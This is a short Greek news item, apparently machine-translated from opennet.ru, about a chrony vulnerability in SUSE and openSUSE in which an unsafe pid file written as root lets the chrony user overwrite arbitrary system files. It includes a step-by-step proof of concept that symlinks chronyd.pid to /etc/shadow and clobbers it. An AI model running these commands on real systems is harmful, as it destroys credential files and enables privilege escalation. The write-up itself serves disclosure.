В
Η ευπάθεια προκαλείται από την μη ασφαλή δημιουργία ενός αρχείου pid, το οποίο δημιουργήθηκε σε ένα στάδιο που το chrony δεν είχε ακόμη επαναφέρει τα προνόμια και εκτελούσε ως root. Σε αυτήν την περίπτωση, ο κατάλογος /run/chrony, στον οποίο είναι γραμμένο το αρχείο pid, δημιουργήθηκε με δικαιώματα 0750 μέσω systemd-tmpfiles ή κατά την εκκίνηση του chronyd σε συνδυασμό με τον χρήστη και την ομάδα "chrony". Έτσι, εάν έχετε πρόσβαση στο chrony χρήστη, μπορείτε να αντικαταστήσετε το αρχείο pid /run/chrony/chronyd.pid με έναν συμβολικό σύνδεσμο. Ένας συμβολικός σύνδεσμος μπορεί να οδηγεί σε οποιοδήποτε αρχείο συστήματος που θα αντικατασταθεί κατά την εκκίνηση του chronyd.
root# systemctl stop chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ έξοδος
root# /usr/sbin/chronyd -n
^C
# αντί για τα περιεχόμενα του /etc/shadow θα αποθηκευτεί το chronyd process ID
root# cat /etc/shadow
15287
Τρωτό
Πρόβλημα SUSE και openSUSE
Πηγή: opennet.ru